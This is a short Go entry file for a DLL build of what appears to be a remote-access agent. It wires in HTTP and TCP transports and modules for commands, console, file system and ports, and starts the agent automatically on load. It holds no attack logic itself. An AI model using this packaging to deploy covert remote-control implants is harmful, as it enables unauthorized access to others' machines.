//go:build dll

package main

import (
	"agent/internal"

	_ "agent/transports/http"
	_ "agent/transports/tcp"

	_ "agent/modules/commands"
	_ "agent/modules/console"
	_ "agent/modules/fs"
	_ "agent/modules/ports"
	_ "agent/modules/tiktak"
)

func init() {
	go internal.AppMain()
}

func main() {}
